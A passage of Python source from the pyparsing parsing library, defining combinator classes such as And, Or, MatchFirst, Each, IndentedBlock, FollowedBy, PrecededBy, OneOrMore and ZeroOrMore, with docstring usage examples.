self.exprs = other.exprs[:] + [self.exprs[1]]
self._defaultName = None
self.mayReturnEmpty |= other.mayReturnEmpty
self.mayIndexError |= other.mayIndexError
other = self.exprs[-1]
if (
isinstance(other, self.__class__)
and not other.parseAction
and other.resultsName is None
and not other.debug
):
self.exprs = self.exprs[:-1] + other.exprs[:]
self._defaultName = None
self.mayReturnEmpty |= other.mayReturnEmpty
self.mayIndexError |= other.mayIndexError
self.errmsg = "Expected " + str(self)
return self
def validate(self, validateTrace=None):
tmp = (validateTrace if validateTrace is not None else [])[:] + [self]
for e in self.exprs:
e.validate(tmp)
self._checkRecursion([])
def copy(self):
ret = super().copy()
ret.exprs = [e.copy() for e in self.exprs]
return ret
def _setResultsName(self, name, listAllMatches=False):
if (
__diag__.warn_ungrouped_named_tokens_in_collection
and Diagnostics.warn_ungrouped_named_tokens_in_collection
not in self.suppress_warnings_
):
for e in self.exprs:
if (
isinstance(e, ParserElement)
and e.resultsName
and Diagnostics.warn_ungrouped_named_tokens_in_collection
not in e.suppress_warnings_
):
warnings.warn(
"{}: setting results name {!r} on {} expression "
"collides with {!r} on contained expression".format(
"warn_ungrouped_named_tokens_in_collection",
name,
type(self).__name__,
e.resultsName,
),
stacklevel=3,
)
return super()._setResultsName(name, listAllMatches)
ignoreWhitespace = ignore_whitespace
leaveWhitespace = leave_whitespace
class And(ParseExpression):
"""
Requires all given :class:`ParseExpression` s to be found in the given order.
Expressions may be separated by whitespace.
May be constructed using the ``'+'`` operator.
May also be constructed using the ``'-'`` operator, which will
suppress backtracking.
Example::
integer = Word(nums)
name_expr = OneOrMore(Word(alphas))
expr = And([integer("id"), name_expr("name"), integer("age")])
# more easily written as:
expr = integer("id") + name_expr("name") + integer("age")
"""
class _ErrorStop(Empty):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.leave_whitespace()
def _generateDefaultName(self):
return "-"
def __init__(self, exprs_arg: IterableType[ParserElement], savelist: bool = True):
exprs: List[ParserElement] = list(exprs_arg)
if exprs and Ellipsis in exprs:
tmp = []
for i, expr in enumerate(exprs):
if expr is Ellipsis:
if i < len(exprs) - 1:
skipto_arg: ParserElement = (Empty() + exprs[i + 1]).exprs[-1]
tmp.append(SkipTo(skipto_arg)("_skipped*"))
else:
raise Exception(
"cannot construct And with sequence ending in ..."
)
else:
tmp.append(expr)
exprs[:] = tmp
super().__init__(exprs, savelist)
if self.exprs:
self.mayReturnEmpty = all(e.mayReturnEmpty for e in self.exprs)
self.set_whitespace_chars(
self.exprs[0].whiteChars,
copy_defaults=self.exprs[0].copyDefaultWhiteChars,
)
self.skipWhitespace = self.exprs[0].skipWhitespace
else:
self.mayReturnEmpty = True
self.callPreparse = True
def streamline(self) -> ParserElement:
# collapse any _PendingSkip's
if self.exprs:
if any(
isinstance(e, ParseExpression)
and e.exprs
and isinstance(e.exprs[-1], _PendingSkip)
for e in self.exprs[:-1]
):
for i, e in enumerate(self.exprs[:-1]):
if e is None:
continue
if (
isinstance(e, ParseExpression)
and e.exprs
and isinstance(e.exprs[-1], _PendingSkip)
):
e.exprs[-1] = e.exprs[-1] + self.exprs[i + 1]
self.exprs[i + 1] = None
self.exprs = [e for e in self.exprs if e is not None]
super().streamline()
# link any IndentedBlocks to the prior expression
for prev, cur in zip(self.exprs, self.exprs[1:]):
# traverse cur or any first embedded expr of cur looking for an IndentedBlock
# (but watch out for recursive grammar)
seen = set()
while cur:
if id(cur) in seen:
break
seen.add(id(cur))
if isinstance(cur, IndentedBlock):
prev.add_parse_action(
# bind the current value of cur; a bare closure would see the loop's final value
lambda s, l, t, cur_=cur: setattr(cur_, "parent_anchor", col(l, s))
)
break
subs = cur.recurse()
cur = next(iter(subs), None)
self.mayReturnEmpty = all(e.mayReturnEmpty for e in self.exprs)
return self
def parseImpl(self, instring, loc, doActions=True):
# pass False as callPreParse arg to _parse for first element, since we already
# pre-parsed the string as part of our And pre-parsing
loc, resultlist = self.exprs[0]._parse(
instring, loc, doActions, callPreParse=False
)
errorStop = False
for e in self.exprs[1:]:
# if isinstance(e, And._ErrorStop):
if type(e) is And._ErrorStop:
errorStop = True
continue
if errorStop:
try:
loc, exprtokens = e._parse(instring, loc, doActions)
except ParseSyntaxException:
raise
except ParseBaseException as pe:
pe.__traceback__ = None
raise ParseSyntaxException._from_exception(pe)
except IndexError:
raise ParseSyntaxException(
instring, len(instring), self.errmsg, self
)
else:
loc, exprtokens = e._parse(instring, loc, doActions)
if exprtokens or exprtokens.haskeys():
resultlist += exprtokens
return loc, resultlist
def __iadd__(self, other):
if isinstance(other, str_type):
other = self._literalStringClass(other)
return self.append(other) # And([self, other])
def _checkRecursion(self, parseElementList):
subRecCheckList = parseElementList[:] + [self]
for e in self.exprs:
e._checkRecursion(subRecCheckList)
if not e.mayReturnEmpty:
break
def _generateDefaultName(self):
inner = " ".join(str(e) for e in self.exprs)
# strip off redundant inner {}'s
while len(inner) > 1 and inner[0 :: len(inner) - 1] == "{}":
inner = inner[1:-1]
return "{" + inner + "}"
class Or(ParseExpression):
"""Requires that at least one :class:`ParseExpression` is found. If
two expressions match, the expression that matches the longest
string will be used. May be constructed using the ``'^'``
operator.
Example::
# construct Or using '^' operator
number = Word(nums) ^ Combine(Word(nums) + '.' + Word(nums))
print(number.search_string("123 3.1416 789"))
prints::
[['123'], ['3.1416'], ['789']]
"""
def __init__(self, exprs: IterableType[ParserElement], savelist: bool = False):
super().__init__(exprs, savelist)
if self.exprs:
self.mayReturnEmpty = any(e.mayReturnEmpty for e in self.exprs)
self.skipWhitespace = all(e.skipWhitespace for e in self.exprs)
else:
self.mayReturnEmpty = True
def streamline(self) -> ParserElement:
super().streamline()
if self.exprs:
self.mayReturnEmpty = any(e.mayReturnEmpty for e in self.exprs)
self.saveAsList = any(e.saveAsList for e in self.exprs)
self.skipWhitespace = all(e.skipWhitespace for e in self.exprs)
else:
self.saveAsList = False
return self
def parseImpl(self, instring, loc, doActions=True):
maxExcLoc = -1
maxException = None
matches = []
fatals = []
if all(e.callPreparse for e in self.exprs):
loc = self.preParse(instring, loc)
for e in self.exprs:
try:
loc2 = e.try_parse(instring, loc, raise_fatal=True)
except ParseFatalException as pfe:
pfe.__traceback__ = None
pfe.parserElement = e
fatals.append(pfe)
maxException = None
maxExcLoc = -1
except ParseException as err:
if not fatals:
err.__traceback__ = None
if err.loc > maxExcLoc:
maxException = err
maxExcLoc = err.loc
except IndexError:
if len(instring) > maxExcLoc:
maxException = ParseException(
instring, len(instring), e.errmsg, self
)
maxExcLoc = len(instring)
else:
# save match among all matches, to retry longest to shortest
matches.append((loc2, e))
if matches:
# re-evaluate all matches in descending order of length of match, in case attached actions
# might change whether or how much they match of the input.
matches.sort(key=itemgetter(0), reverse=True)
if not doActions:
# no further conditions or parse actions to change the selection of
# alternative, so the first match will be the best match
best_expr = matches[0][1]
return best_expr._parse(instring, loc, doActions)
longest = -1, None
for loc1, expr1 in matches:
if loc1 <= longest[0]:
# already have a longer match than this one will deliver, we are done
return longest
try:
loc2, toks = expr1._parse(instring, loc, doActions)
except ParseException as err:
err.__traceback__ = None
if err.loc > maxExcLoc:
maxException = err
maxExcLoc = err.loc
else:
if loc2 >= loc1:
return loc2, toks
# didn't match as much as before
elif loc2 > longest[0]:
longest = loc2, toks
if longest != (-1, None):
return longest
if fatals:
if len(fatals) > 1:
fatals.sort(key=lambda e: -e.loc)
if fatals[0].loc == fatals[1].loc:
fatals.sort(key=lambda e: (-e.loc, -len(str(e.parserElement))))
max_fatal = fatals[0]
raise max_fatal
if maxException is not None:
maxException.msg = self.errmsg
raise maxException
else:
raise ParseException(
instring, loc, "no defined alternatives to match", self
)
def __ixor__(self, other):
if isinstance(other, str_type):
other = self._literalStringClass(other)
return self.append(other) # Or([self, other])
def _generateDefaultName(self):
return "{" + " ^ ".join(str(e) for e in self.exprs) + "}"
def _setResultsName(self, name, listAllMatches=False):
if (
__diag__.warn_multiple_tokens_in_named_alternation
and Diagnostics.warn_multiple_tokens_in_named_alternation
not in self.suppress_warnings_
):
if any(
isinstance(e, And)
and Diagnostics.warn_multiple_tokens_in_named_alternation
not in e.suppress_warnings_
for e in self.exprs
):
warnings.warn(
"{}: setting results name {!r} on {} expression "
"will return a list of all parsed tokens in an And alternative, "
"in prior versions only the first token was returned; enclose"
"contained argument in Group".format(
"warn_multiple_tokens_in_named_alternation",
name,
type(self).__name__,
),
stacklevel=3,
)
return super()._setResultsName(name, listAllMatches)
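# Illustrative usage sketch (added note): Or ('^') evaluates every alternative and
# keeps the longest match, whereas MatchFirst ('|') stops at the first alternative
# that matches at all.
#
#   number = Word(nums) ^ Combine(Word(nums) + "." + Word(nums))
#   number.parse_string("3.1416")   # -> ['3.1416']  (longest alternative wins)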
class MatchFirst(ParseExpression):
"""Requires that at least one :class:`ParseExpression` is found. If
more than one expression matches, the first one listed is the one that will
match. May be constructed using the ``'|'`` operator.
Example::
# construct MatchFirst using '|' operator
# watch the order of expressions to match
number = Word(nums) | Combine(Word(nums) + '.' + Word(nums))
print(number.search_string("123 3.1416 789")) # Fail! -> [['123'], ['3'], ['1416'], ['789']]
# put more selective expression first
number = Combine(Word(nums) + '.' + Word(nums)) | Word(nums)
print(number.search_string("123 3.1416 789")) # Better -> [['123'], ['3.1416'], ['789']]
"""
def __init__(self, exprs: IterableType[ParserElement], savelist: bool = False):
super().__init__(exprs, savelist)
if self.exprs:
self.mayReturnEmpty = any(e.mayReturnEmpty for e in self.exprs)
self.skipWhitespace = all(e.skipWhitespace for e in self.exprs)
else:
self.mayReturnEmpty = True
def streamline(self) -> ParserElement:
if self.streamlined:
return self
super().streamline()
if self.exprs:
self.saveAsList = any(e.saveAsList for e in self.exprs)
self.mayReturnEmpty = any(e.mayReturnEmpty for e in self.exprs)
self.skipWhitespace = all(e.skipWhitespace for e in self.exprs)
else:
self.saveAsList = False
self.mayReturnEmpty = True
return self
def parseImpl(self, instring, loc, doActions=True):
maxExcLoc = -1
maxException = None
for e in self.exprs:
try:
return e._parse(
instring,
loc,
doActions,
)
except ParseFatalException as pfe:
pfe.__traceback__ = None
pfe.parserElement = e
raise
except ParseException as err:
if err.loc > maxExcLoc:
maxException = err
maxExcLoc = err.loc
except IndexError:
if len(instring) > maxExcLoc:
maxException = ParseException(
instring, len(instring), e.errmsg, self
)
maxExcLoc = len(instring)
if maxException is not None:
maxException.msg = self.errmsg
raise maxException
else:
raise ParseException(
instring, loc, "no defined alternatives to match", self
)
def __ior__(self, other):
if isinstance(other, str_type):
other = self._literalStringClass(other)
return self.append(other) # MatchFirst([self, other])
def _generateDefaultName(self):
return "{" + " | ".join(str(e) for e in self.exprs) + "}"
def _setResultsName(self, name, listAllMatches=False):
if (
__diag__.warn_multiple_tokens_in_named_alternation
and Diagnostics.warn_multiple_tokens_in_named_alternation
not in self.suppress_warnings_
):
if any(
isinstance(e, And)
and Diagnostics.warn_multiple_tokens_in_named_alternation
not in e.suppress_warnings_
for e in self.exprs
):
warnings.warn(
"{}: setting results name {!r} on {} expression "
"will return a list of all parsed tokens in an And alternative, "
"in prior versions only the first token was returned; enclose"
"contained argument in Group".format(
"warn_multiple_tokens_in_named_alternation",
name,
type(self).__name__,
),
stacklevel=3,
)
return super()._setResultsName(name, listAllMatches)
class Each(ParseExpression):
"""Requires all given :class:`ParseExpression` s to be found, but in
any order. Expressions may be separated by whitespace.
May be constructed using the ``'&'`` operator.
Example::
color = one_of("RED ORANGE YELLOW GREEN BLUE PURPLE BLACK WHITE BROWN")
shape_type = one_of("SQUARE CIRCLE TRIANGLE STAR HEXAGON OCTAGON")
integer = Word(nums)
shape_attr = "shape:" + shape_type("shape")
posn_attr = "posn:" + Group(integer("x") + ',' + integer("y"))("posn")
color_attr = "color:" + color("color")
size_attr = "size:" + integer("size")
# use Each (using operator '&') to accept attributes in any order
# (shape and posn are required, color and size are optional)
shape_spec = shape_attr & posn_attr & Opt(color_attr) & Opt(size_attr)
shape_spec.run_tests('''
shape: SQUARE color: BLACK posn: 100, 120
shape: CIRCLE size: 50 color: BLUE posn: 50,80
color:GREEN size:20 shape:TRIANGLE posn:20,40
'''
)
prints::
shape: SQUARE color: BLACK posn: 100, 120
['shape:', 'SQUARE', 'color:', 'BLACK', 'posn:', ['100', ',', '120']]
- color: BLACK
- posn: ['100', ',', '120']
- x: 100
- y: 120
- shape: SQUARE
shape: CIRCLE size: 50 color: BLUE posn: 50,80
['shape:', 'CIRCLE', 'size:', '50', 'color:', 'BLUE', 'posn:', ['50', ',', '80']]
- color: BLUE
- posn: ['50', ',', '80']
- x: 50
- y: 80
- shape: CIRCLE
- size: 50
color: GREEN size: 20 shape: TRIANGLE posn: 20,40
['color:', 'GREEN', 'size:', '20', 'shape:', 'TRIANGLE', 'posn:', ['20', ',', '40']]
- color: GREEN
- posn: ['20', ',', '40']
- x: 20
- y: 40
- shape: TRIANGLE
- size: 20
"""
def __init__(self, exprs: IterableType[ParserElement], savelist: bool = True):
super().__init__(exprs, savelist)
if self.exprs:
self.mayReturnEmpty = all(e.mayReturnEmpty for e in self.exprs)
else:
self.mayReturnEmpty = True
self.skipWhitespace = True
self.initExprGroups = True
self.saveAsList = True
def streamline(self) -> ParserElement:
super().streamline()
if self.exprs:
self.mayReturnEmpty = all(e.mayReturnEmpty for e in self.exprs)
else:
self.mayReturnEmpty = True
return self
def parseImpl(self, instring, loc, doActions=True):
if self.initExprGroups:
self.opt1map = dict(
(id(e.expr), e) for e in self.exprs if isinstance(e, Opt)
)
opt1 = [e.expr for e in self.exprs if isinstance(e, Opt)]
opt2 = [
e
for e in self.exprs
if e.mayReturnEmpty and not isinstance(e, (Opt, Regex, ZeroOrMore))
]
self.optionals = opt1 + opt2
self.multioptionals = [
e.expr.set_results_name(e.resultsName, list_all_matches=True)
for e in self.exprs
if isinstance(e, _MultipleMatch)
]
self.multirequired = [
e.expr.set_results_name(e.resultsName, list_all_matches=True)
for e in self.exprs
if isinstance(e, OneOrMore)
]
self.required = [
e for e in self.exprs if not isinstance(e, (Opt, ZeroOrMore, OneOrMore))
]
self.required += self.multirequired
self.initExprGroups = False
tmpLoc = loc
tmpReqd = self.required[:]
tmpOpt = self.optionals[:]
multis = self.multioptionals[:]
matchOrder = []
keepMatching = True
failed = []
fatals = []
while keepMatching:
tmpExprs = tmpReqd + tmpOpt + multis
failed.clear()
fatals.clear()
for e in tmpExprs:
try:
tmpLoc = e.try_parse(instring, tmpLoc, raise_fatal=True)
except ParseFatalException as pfe:
pfe.__traceback__ = None
pfe.parserElement = e
fatals.append(pfe)
failed.append(e)
except ParseException:
failed.append(e)
else:
matchOrder.append(self.opt1map.get(id(e), e))
if e in tmpReqd:
tmpReqd.remove(e)
elif e in tmpOpt:
tmpOpt.remove(e)
if len(failed) == len(tmpExprs):
keepMatching = False
# look for any ParseFatalExceptions
if fatals:
if len(fatals) > 1:
fatals.sort(key=lambda e: -e.loc)
if fatals[0].loc == fatals[1].loc:
fatals.sort(key=lambda e: (-e.loc, -len(str(e.parserElement))))
max_fatal = fatals[0]
raise max_fatal
if tmpReqd:
missing = ", ".join(str(e) for e in tmpReqd)
raise ParseException(
instring,
loc,
"Missing one or more required elements ({})".format(missing),
)
# add any unmatched Opts, in case they have default values defined
matchOrder += [e for e in self.exprs if isinstance(e, Opt) and e.expr in tmpOpt]
total_results = ParseResults([])
for e in matchOrder:
loc, results = e._parse(instring, loc, doActions)
total_results += results
return loc, total_results
def _generateDefaultName(self):
return "{" + " & ".join(str(e) for e in self.exprs) + "}"
class ParseElementEnhance(ParserElement):
"""Abstract subclass of :class:`ParserElement`, for combining and
post-processing parsed tokens.
"""
def __init__(self, expr: Union[ParserElement, str], savelist: bool = False):
super().__init__(savelist)
if isinstance(expr, str_type):
if issubclass(self._literalStringClass, Token):
expr = self._literalStringClass(expr)
elif issubclass(type(self), self._literalStringClass):
expr = Literal(expr)
else:
expr = self._literalStringClass(Literal(expr))
self.expr = expr
if expr is not None:
self.mayIndexError = expr.mayIndexError
self.mayReturnEmpty = expr.mayReturnEmpty
self.set_whitespace_chars(
expr.whiteChars, copy_defaults=expr.copyDefaultWhiteChars
)
self.skipWhitespace = expr.skipWhitespace
self.saveAsList = expr.saveAsList
self.callPreparse = expr.callPreparse
self.ignoreExprs.extend(expr.ignoreExprs)
def recurse(self):
return [self.expr] if self.expr is not None else []
def parseImpl(self, instring, loc, doActions=True):
if self.expr is not None:
return self.expr._parse(instring, loc, doActions, callPreParse=False)
else:
raise ParseException("", loc, self.errmsg, self)
def leave_whitespace(self, recursive=True):
super().leave_whitespace(recursive)
if recursive:
self.expr = self.expr.copy()
if self.expr is not None:
self.expr.leave_whitespace(recursive)
return self
def ignore_whitespace(self, recursive=True):
super().ignore_whitespace(recursive)
if recursive:
self.expr = self.expr.copy()
if self.expr is not None:
self.expr.ignore_whitespace(recursive)
return self
def ignore(self, other):
if isinstance(other, Suppress):
if other not in self.ignoreExprs:
super().ignore(other)
if self.expr is not None:
self.expr.ignore(self.ignoreExprs[-1])
else:
super().ignore(other)
if self.expr is not None:
self.expr.ignore(self.ignoreExprs[-1])
return self
def streamline(self):
super().streamline()
if self.expr is not None:
self.expr.streamline()
return self
def _checkRecursion(self, parseElementList):
if self in parseElementList:
raise RecursiveGrammarException(parseElementList + [self])
subRecCheckList = parseElementList[:] + [self]
if self.expr is not None:
self.expr._checkRecursion(subRecCheckList)
def validate(self, validateTrace=None):
if validateTrace is None:
validateTrace = []
tmp = validateTrace[:] + [self]
if self.expr is not None:
self.expr.validate(tmp)
self._checkRecursion([])
def _generateDefaultName(self):
return "{}:({})".format(self.__class__.__name__, str(self.expr))
ignoreWhitespace = ignore_whitespace
leaveWhitespace = leave_whitespace
class IndentedBlock(ParseElementEnhance):
"""
Expression to match one or more expressions at a given indentation level.
Useful for parsing text where structure is implied by indentation (like Python source code).
"""
class _Indent(Empty):
def __init__(self, ref_col: int):
super().__init__()
self.errmsg = "expected indent at column {}".format(ref_col)
self.add_condition(lambda s, l, t: col(l, s) == ref_col)
class _IndentGreater(Empty):
def __init__(self, ref_col: int):
super().__init__()
self.errmsg = "expected indent at column greater than {}".format(ref_col)
self.add_condition(lambda s, l, t: col(l, s) > ref_col)
def __init__(
self, expr: ParserElement, *, recursive: bool = False, grouped: bool = True
):
super().__init__(expr, savelist=True)
# if recursive:
# raise NotImplementedError("IndentedBlock with recursive is not implemented")
self._recursive = recursive
self._grouped = grouped
self.parent_anchor = 1
def parseImpl(self, instring, loc, doActions=True):
# advance parse position to non-whitespace by using an Empty()
# this should be the column to be used for all subsequent indented lines
anchor_loc = Empty().preParse(instring, loc)
# see if self.expr matches at the current location - if not it will raise an exception
# and no further work is necessary
self.expr.try_parse(instring, anchor_loc, doActions)
indent_col = col(anchor_loc, instring)
peer_detect_expr = self._Indent(indent_col)
inner_expr = Empty() + peer_detect_expr + self.expr
if self._recursive:
sub_indent = self._IndentGreater(indent_col)
nested_block = IndentedBlock(
self.expr, recursive=self._recursive, grouped=self._grouped
)
nested_block.set_debug(self.debug)
nested_block.parent_anchor = indent_col
inner_expr += Opt(sub_indent + nested_block)
inner_expr.set_name(f"inner {hex(id(inner_expr))[-4:].upper()}@{indent_col}")
block = OneOrMore(inner_expr)
trailing_undent = self._Indent(self.parent_anchor) | StringEnd()
if self._grouped:
wrapper = Group
else:
wrapper = lambda expr: expr
return (wrapper(block) + Optional(trailing_undent)).parseImpl(
instring, anchor_loc, doActions
)
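# Illustrative usage sketch (added note, behavior inferred from parseImpl above):
# IndentedBlock gathers one or more expressions that all start at the same, deeper
# indentation column than the surrounding text.
#
#   stmt = Word(alphas)
#   suite = IndentedBlock(stmt)
#   block = Keyword("block") + Suppress(":") + suite
#   block.parse_string("block:\n    a\n    b")   # suite groups to ['a', 'b']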
class AtStringStart(ParseElementEnhance):
"""Matches if expression matches at the beginning of the parse
string::
AtStringStart(Word(nums)).parse_string("123")
# prints ["123"]
AtStringStart(Word(nums)).parse_string(" 123")
# raises ParseException
"""
def __init__(self, expr: Union[ParserElement, str]):
super().__init__(expr)
self.callPreparse = False
def parseImpl(self, instring, loc, doActions=True):
if loc != 0:
raise ParseException(instring, loc, "not found at string start")
return super().parseImpl(instring, loc, doActions)
class AtLineStart(ParseElementEnhance):
r"""Matches if an expression matches at the beginning of a line within
the parse string
Example::
test = '''\
AAA this line
AAA and this line
AAA but not this one
B AAA and definitely not this one
'''
for t in (AtLineStart('AAA') + restOfLine).search_string(test):
print(t)
prints::
['AAA', ' this line']
['AAA', ' and this line']
"""
def __init__(self, expr: Union[ParserElement, str]):
super().__init__(expr)
self.callPreparse = False
def parseImpl(self, instring, loc, doActions=True):
if col(loc, instring) != 1:
raise ParseException(instring, loc, "not found at line start")
return super().parseImpl(instring, loc, doActions)
class FollowedBy(ParseElementEnhance):
"""Lookahead matching of the given parse expression.
``FollowedBy`` does *not* advance the parsing position within
the input string, it only verifies that the specified parse
expression matches at the current position. ``FollowedBy``
always returns a null token list. If any results names are defined
in the lookahead expression, those *will* be returned for access by
name.
Example::
# use FollowedBy to match a label only if it is followed by a ':'
data_word = Word(alphas)
label = data_word + FollowedBy(':')
attr_expr = Group(label + Suppress(':') + OneOrMore(data_word, stop_on=label).set_parse_action(' '.join))
OneOrMore(attr_expr).parse_string("shape: SQUARE color: BLACK posn: upper left").pprint()
prints::
[['shape', 'SQUARE'], ['color', 'BLACK'], ['posn', 'upper left']]
"""
def __init__(self, expr: Union[ParserElement, str]):
super().__init__(expr)
self.mayReturnEmpty = True
def parseImpl(self, instring, loc, doActions=True):
# by using self._expr.parse and deleting the contents of the returned ParseResults list
# we keep any named results that were defined in the FollowedBy expression
_, ret = self.expr._parse(instring, loc, doActions=doActions)
del ret[:]
return loc, ret
class PrecededBy(ParseElementEnhance):
"""Lookbehind matching of the given parse expression.
``PrecededBy`` does not advance the parsing position within the
input string, it only verifies that the specified parse expression
matches prior to the current position. ``PrecededBy`` always
returns a null token list, but if a results name is defined on the
given expression, it is returned.
Parameters:
- expr - expression that must match prior to the current parse
location
- retreat - (default= ``None``) - (int) maximum number of characters
to lookbehind prior to the current parse location
If the lookbehind expression is a string, :class:`Literal`,
:class:`Keyword`, or a :class:`Word` or :class:`CharsNotIn`
with a specified exact or maximum length, then the retreat
parameter is not required. Otherwise, retreat must be specified to
give a maximum number of characters to look back from
the current parse position for a lookbehind match.
Example::
# VB-style variable names with type prefixes
int_var = PrecededBy("#") + pyparsing_common.identifier
str_var = PrecededBy("$") + pyparsing_common.identifier
"""
def __init__(
self, expr: Union[ParserElement, str], retreat: OptionalType[int] = None
):
super().__init__(expr)
self.expr = self.expr().leave_whitespace()
self.mayReturnEmpty = True
self.mayIndexError = False
self.exact = False
if isinstance(expr, str_type):
retreat = len(expr)
self.exact = True
elif isinstance(expr, (Literal, Keyword)):
retreat = expr.matchLen
self.exact = True
elif isinstance(expr, (Word, CharsNotIn)) and expr.maxLen != _MAX_INT:
retreat = expr.maxLen
self.exact = True
elif isinstance(expr, PositionToken):
retreat = 0
self.exact = True
self.retreat = retreat
self.errmsg = "not preceded by " + str(expr)
self.skipWhitespace = False
self.parseAction.append(lambda s, l, t: t.__delitem__(slice(None, None)))
def parseImpl(self, instring, loc=0, doActions=True):
if self.exact:
if loc < self.retreat:
raise ParseException(instring, loc, self.errmsg)
start = loc - self.retreat
_, ret = self.expr._parse(instring, start)
else:
# retreat specified a maximum lookbehind window, iterate
test_expr = self.expr + StringEnd()
instring_slice = instring[max(0, loc - self.retreat) : loc]
last_expr = ParseException(instring, loc, self.errmsg)
for offset in range(1, min(loc, self.retreat + 1) + 1):
try:
# print('trying', offset, instring_slice, repr(instring_slice[loc - offset:]))
_, ret = test_expr._parse(
instring_slice, len(instring_slice) - offset
)
except ParseBaseException as pbe:
last_expr = pbe
else:
break
else:
raise last_expr
return loc, ret
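# Illustrative usage sketch (added note): PrecededBy is a zero-width lookbehind;
# here a number is accepted only when the character immediately before it is '$'.
#
#   price = PrecededBy("$") + Word(nums + ".")
#   price.search_string("cost: $42.50 (was $60)")   # -> [['42.50'], ['60']]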
class Located(ParseElementEnhance):
"""
Decorates a returned token with its starting and ending
locations in the input string.
This helper adds the following results names:
- ``locn_start`` - location where matched expression begins
- ``locn_end`` - location where matched expression ends
- ``value`` - the actual parsed results
Be careful if the input text contains ``<TAB>`` characters, you
may want to call :class:`ParserElement.parse_with_tabs`
Example::
wd = Word(alphas)
for match in Located(wd).search_string("ljsdf123lksdjjf123lkkjj1222"):
print(match)
prints::
[0, ['ljsdf'], 5]
[8, ['lksdjjf'], 15]
[18, ['lkkjj'], 23]
"""
def parseImpl(self, instring, loc, doActions=True):
start = loc
loc, tokens = self.expr._parse(instring, start, doActions, callPreParse=False)
ret_tokens = ParseResults([start, tokens, loc])
ret_tokens["locn_start"] = start
ret_tokens["value"] = tokens
ret_tokens["locn_end"] = loc
if self.resultsName:
# must return as a list, so that the name will be attached to the complete group
return loc, [ret_tokens]
else:
return loc, ret_tokens
class NotAny(ParseElementEnhance):
"""
Lookahead to disallow matching with the given parse expression.
``NotAny`` does *not* advance the parsing position within the
input string, it only verifies that the specified parse expression
does *not* match at the current position. Also, ``NotAny`` does
*not* skip over leading whitespace. ``NotAny`` always returns
a null token list. May be constructed using the ``'~'`` operator.
Example::
AND, OR, NOT = map(CaselessKeyword, "AND OR NOT".split())
# take care not to mistake keywords for identifiers
ident = ~(AND | OR | NOT) + Word(alphas)
boolean_term = Opt(NOT) + ident
# very crude boolean expression - to support parenthesis groups and
# operation hierarchy, use infix_notation
boolean_expr = boolean_term + ZeroOrMore((AND | OR) + boolean_term)
# integers that are followed by "." are actually floats
integer = Word(nums) + ~Char(".")
"""
def __init__(self, expr: Union[ParserElement, str]):
super().__init__(expr)
# do NOT use self.leave_whitespace(), don't want to propagate to exprs
# self.leave_whitespace()
self.skipWhitespace = False
self.mayReturnEmpty = True
self.errmsg = "Found unwanted token, " + str(self.expr)
def parseImpl(self, instring, loc, doActions=True):
if self.expr.can_parse_next(instring, loc):
raise ParseException(instring, loc, self.errmsg, self)
return loc, []
def _generateDefaultName(self):
return "~{" + str(self.expr) + "}"
class _MultipleMatch(ParseElementEnhance):
def __init__(
self,
expr: ParserElement,
stop_on: OptionalType[Union[ParserElement, str]] = None,
*,
stopOn: OptionalType[Union[ParserElement, str]] = None,
):
super().__init__(expr)
stopOn = stopOn or stop_on
self.saveAsList = True
ender = stopOn
if isinstance(ender, str_type):
ender = self._literalStringClass(ender)
self.stopOn(ender)
def stopOn(self, ender):
if isinstance(ender, str_type):
ender = self._literalStringClass(ender)
self.not_ender = ~ender if ender is not None else None
return self
def parseImpl(self, instring, loc, doActions=True):
self_expr_parse = self.expr._parse
self_skip_ignorables = self._skipIgnorables
check_ender = self.not_ender is not None
if check_ender:
try_not_ender = self.not_ender.tryParse
# must be at least one (but first see if we are the stopOn sentinel;
# if so, fail)
if check_ender:
try_not_ender(instring, loc)
loc, tokens = self_expr_parse(instring, loc, doActions)
try:
hasIgnoreExprs = not not self.ignoreExprs
while 1:
if check_ender:
try_not_ender(instring, loc)
if hasIgnoreExprs:
preloc = self_skip_ignorables(instring, loc)
else:
preloc = loc
loc, tmptokens = self_expr_parse(instring, preloc, doActions)
if tmptokens or tmptokens.haskeys():
tokens += tmptokens
except (ParseException, IndexError):
pass
return loc, tokens
def _setResultsName(self, name, listAllMatches=False):
if (
__diag__.warn_ungrouped_named_tokens_in_collection
and Diagnostics.warn_ungrouped_named_tokens_in_collection
not in self.suppress_warnings_
):
for e in [self.expr] + self.expr.recurse():
if (
isinstance(e, ParserElement)
and e.resultsName
and Diagnostics.warn_ungrouped_named_tokens_in_collection
not in e.suppress_warnings_
):
warnings.warn(
"{}: setting results name {!r} on {} expression "
"collides with {!r} on contained expression".format(
"warn_ungrouped_named_tokens_in_collection",
name,
type(self).__name__,
e.resultsName,
),
stacklevel=3,
)
return super()._setResultsName(name, listAllMatches)
class OneOrMore(_MultipleMatch):
"""
Repetition of one or more of the given expression.
Parameters:
- expr - expression that must match one or more times
- stop_on - (default= ``None``) - expression for a terminating sentinel
(only required if the sentinel would ordinarily match the repetition
expression)
Example::
data_word = Word(alphas)
label = data_word + FollowedBy(':')
attr_expr = Group(label + Suppress(':') + OneOrMore(data_word).set_parse_action(' '.join))
text = "shape: SQUARE posn: upper left color: BLACK"
OneOrMore(attr_expr).parse_string(text).pprint() # Fail! read 'color' as data instead of next label -> [['shape', 'SQUARE color']]
# use stop_on attribute for OneOrMore to avoid reading label string as part of the data
attr_expr = Group(label + Suppress(':') + OneOrMore(data_word, stop_on=label).set_parse_action(' '.join))
OneOrMore(attr_expr).parse_string(text).pprint() # Better -> [['shape', 'SQUARE'], ['posn', 'upper left'], ['color', 'BLACK']]
# could also be written as
(attr_expr * (1,)).parse_string(text).pprint()
"""
def _generateDefaultName(self):
return "{" + str(self.expr) + "}..."
class ZeroOrMore(_MultipleMatch):
"""
Optional repetition of zero or more of the given expression.
Parameters:
- ``expr`` - expression that must match zero or more times
- ``stop_on`` - expression for a terminating sentinel
(only required if the sentinel would ordinarily match the repetition
expression) - (default= ``None``)
Example: similar to :class:`OneOrMore`
"""
def __init__(
self,
expr: ParserElement,
stop_on: OptionalType[Union[ParserElement, str]] = None,
*,
stopOn: OptionalType[Union[ParserElement, str]] = None,
):
super().__init__(expr, stopOn=stopOn or stop_on)
self.mayReturnEmpty = True
def parseImpl(self, instring, loc, doActions=True):
try:
return super().parseImpl(instring, loc, doActions)
except (ParseException, IndexError):
return loc, ParseResults([], name=self.resultsName)
def _generateDefaultName(self):
return "[" + str(self.expr) + "]..."
class _NullToken:
def __bool__(self):
return False
def __str__(self):
return ""
class Opt(ParseElementEnhance):
"""
Optional matching of the given expression.
Parameters:
